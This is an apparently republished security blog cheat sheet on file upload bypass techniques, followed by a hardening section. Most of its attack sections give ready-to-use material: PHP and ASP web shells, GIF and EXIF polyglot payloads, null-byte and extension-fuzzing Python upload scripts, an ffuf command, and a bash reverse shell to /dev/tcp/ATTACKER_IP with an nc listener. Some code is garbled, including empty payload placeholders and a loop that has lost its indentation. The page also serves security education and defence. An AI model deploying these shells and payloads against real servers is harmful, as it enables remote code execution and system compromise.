The Ultimate File Upload Exploitation Cheat Sheet: 7 Ways Hackers Bypass Your Filters (And How to Stop Them) + Video

By /

Listen to this Post

Featured Image

Introduction:

File upload functionalities are one of the most common yet dangerous attack vectors in modern web applications. When improperly secured, they allow attackers to upload malicious scripts, backdoors, or polyglot files that can lead to remote code execution (RCE) and full system compromise. This article extracts technical insights from the “File Upload Cheat Sheet” shared by Hacking Articles (Telegram: https://lnkd.in/guNwrc_d) and provides a comprehensive, hands-on guide to both exploiting and hardening file upload mechanisms across Linux and Windows environments.

Learning Objectives:

  • Understand and replicate seven common file upload bypass techniques used by penetration testers and red teams.
  • Implement server‑side validation, content inspection, and secure configuration on Apache, Nginx, and IIS.
  • Use automated tools and manual commands to detect, exploit, and mitigate file upload vulnerabilities.

You Should Know:

  1. Common File Upload Bypass Techniques – Client‑Side vs. Server‑Side

Many applications rely solely on JavaScript or HTML attributes (e.g., accept="image/") for filtering. Attackers trivially bypass client‑side checks by intercepting and modifying requests with Burp Suite or simply disabling JavaScript.

Step‑by‑step guide:

  • Intercept the upload request using Burp Suite or OWASP ZAP.
  • Change the `Content-Type` header from `application/x-php` to `image/jpeg` or text/plain.
  • Modify the filename extension (e.g., shell.php.jpg) and observe if the server still executes the file.
  • Use a simple PHP test payload: `` saved as test.php.

Linux command to test upload directory permissions:

find /var/www/html/uploads -type f -exec ls -la {} \;

Windows PowerShell equivalent:

Get-ChildItem -Path C:\inetpub\wwwroot\uploads -Recurse | Select-Object Name, Length, LastWriteTime

2. MIME Type Spoofing and Content‑Type Validation Bypass

Servers that check only the `Content-Type` header (not the actual file content) are easily fooled. Attackers can upload a malicious script while claiming it is an image.

Step‑by‑step guide:

  • Craft a PHP web shell: `` and save as evil.php.
  • In Burp Suite, change the `Content-Type` to image/png.
  • Send the request. If the server accepts it, navigate to /uploads/evil.php?cmd=whoami.
  • For more stealth, embed PHP code inside a real image (polyglot): 
    exiftool -Comment='<?php system($_GET["cmd"]); ?>' legit.jpg
cp legit.jpg evil.jpg.php
  • Upload `evil.jpg.php` with Content-Type: image/jpeg. Some servers will execute the PHP code due to misconfigured handlers.
  1. Double Extensions and Null Byte Injection (Legacy Systems)

Older systems (Apache before 2.x, some Windows configurations) treat null bytes as string terminators, ignoring everything after %00. This allows `shell.php%00.jpg` to be saved as shell.php.

Step‑by‑step guide (for educational testing only):

  • Intercept upload request and modify filename to shell.php%00.jpg.
  • Ensure the server uses a C‑based file system function (e.g., `fopen` in older PHP versions).
  • Alternatively, use double extensions: `shell.php.jpg` – if Apache is misconfigured with AddHandler php5-script .php .jpg, it will execute.
  • Modern mitigation: validate input sanitization and avoid `%00` by rejecting null bytes.
  • Test with a Python script: 
    import requests
url = "http://target.com/upload"
files = {'file': ('shell.php\x00.jpg', '<?php system("id"); ?>', 'image/jpeg')}
r = requests.post(url, files=files)
print(r.text)
  1. Image Magic Bytes and Polyglot Files – Hiding Payloads in Metadata

Advanced bypasses involve creating files that are valid images and valid scripts simultaneously. This defeats both extension and magic‑number checks.

Step‑by‑step guide:

  • Create a minimal GIF polyglot: 
    echo -e 'GIF89a\x00\x00\x00\x00<?php system($_GET["cmd"]); ?>' > polyglot.php.gif
  • Upload the file. If the server checks only the first 6 bytes (GIF89a), it passes.
  • Use `exiftool` to inject a PHP payload into an image comment: 
    exiftool -Description="<?php echo 'Vulnerable'; ?>" image.jpg
  • If the server executes embedded PHP (e.g., via `include` of image metadata), you achieve RCE.
  • Verify with strings polyglot.php.gif | grep "<?php".
  1. Deploying a Web Shell via Upload – From Upload to System Access

Once a file upload vulnerability is confirmed, the next step is deploying a functional web shell for persistence and lateral movement.

Step‑by‑step guide (red team simulation):

  • Use a minimalistic web shell like cmd.php: 
    <?php if(isset($_REQUEST['cmd'])){ echo '<pre>'; system($_REQUEST['cmd']); echo '</pre>'; } ?>
  • Upload using any bypass technique from sections 1–4.
  • Access the shell: `http://target.com/uploads/cmd.php?cmd=whoami`
    – For Windows targets, adapt the payload:

    <% eval request("cmd") %>

    – Use a reverse shell for interactive access:

     Linux reverse shell payload (upload as .php)
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'"); ?>

    – Set up listener: `nc -lvnp 4444`

  1. Mitigation: Secure File Upload Hardening – Commands for Linux & Windows

Effective defense requires multiple layers: whitelist extensions, rename files, scan content, and set proper permissions.

Step‑by‑step guide for system administrators:

  • Whitelist extensions – Only allow jpg, png, pdf, txt. Reject all others.
  • Rename files – Use random UUIDs, never trust user‑supplied names.
  • Disable script execution in upload directories:
  • Apache: place `.htaccess` with `php_flag engine off`
    – Nginx: `location ~ ^/uploads/.\.(php|pl|py|jsp|asp)$ { deny all; }`
    – IIS: Remove script handlers from upload folder via `web.config`
    – Validate file content – Use `file` command on Linux:

    file --mime-type -b upload.bin
  • Windows PowerShell content validation: 
    $mime = [System.Web.MimeMapping]::GetMimeMapping("file.jpg")
if ($mime -ne "image/jpeg") { Remove-Item "file.jpg" }
  • Scan for malware – Integrate ClamAV: 
    clamscan --no-summary --infected upload.php
  • Set restrictive permissions: 
    chmod 644 /var/www/uploads/ && chown www-data:www-data /var/www/uploads
  1. Automated Scanning with Burp Suite & Custom Scripts

Penetration testers automate file upload testing using Burp Intruder, ffuf, and custom Python scripts.

Step‑by‑step guide:

  • Use Burp Intruder with a payload list of malicious extensions (.php, .php5, .phtml, .asp, .aspx, .jsp).
  • Fuzz the `filename` parameter with null bytes, double extensions, and case variations.
  • Example ffuf command: 
    ffuf -u http://target.com/upload -X POST -H "Content-Type: multipart/form-data" -d "filename=FUZZ" -w extensions.txt -fs 1234
  • Python script to test multiple bypass payloads: 
    import requests
payloads = ['shell.php', 'shell.php.jpg', 'shell.php%00.jpg', 'shell.phtml']
for p in payloads:
files = {'file': (p, '<?php system("id"); ?>', 'image/jpeg')}
r = requests.post('http://target.com/upload', files=files)
if r.status_code == 200:
print(f'Potential upload: {p}')
  • Always run automated scans in authenticated context when applicable.

What Undercode Say:

  • File upload vulnerabilities remain a top-10 OWASP risk because they bypass traditional perimeter defenses and directly enable remote code execution.
  • Defense must be layered: whitelist extensions, rename files, scan magic bytes, disable execution, and apply least privilege – no single control is sufficient.
  • The Telegram cheat sheet (https://lnkd.in/guNwrc_d) provides a quick reference, but real security requires understanding how each bypass works to build effective countermeasures.
  • Both Linux and Windows environments are equally susceptible; IIS misconfigurations with ASP and ASPX are still widely exploited in corporate networks.
  • Automated fuzzing combined with manual polyglot creation gives red teams a high success rate against poorly validated upload forms.
  • Blue teams should implement real‑time content disarm and reconstruction (CDR) and use Web Application Firewalls (WAF) with granular file inspection rules.
  • Regular penetration testing on upload endpoints is non‑negotiable – they are often forgotten during CI/CD pipelines.
  • Cloud storage integrations (S3, Azure Blob) introduce new risks if direct uploads bypass application‑side validation.
  • Training developers on secure file handling using the principles in this article reduces vulnerabilities at the source.
  • The future of file upload attacks will focus on bypassing AI‑based content filters using adversarial image payloads.

Prediction:

As AI‑driven security scanners become mainstream, attackers will shift from simple extension and MIME spoofing to more sophisticated polyglot files that exploit semantic ambiguities in machine learning models. We will see an increase in “data‑only” file upload attacks where malicious code is hidden inside valid JSON, XML, or PDF structures, bypassing signature‑based detection. Concurrently, automated red team tooling will integrate LLMs to generate context‑aware payloads tailored to each application’s validation logic. Organizations must adopt zero‑trust file handling, treating every uploaded file as untrusted until executed in a sandboxed environment. The arms race between file upload filters and bypass techniques is only accelerating.

▶️ Related Video (72% Match):

🎯Let’s Practice For Free:

IT/Security Reporter URL:

Reported By: Cybersecurity Infosec – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky

Related Posts: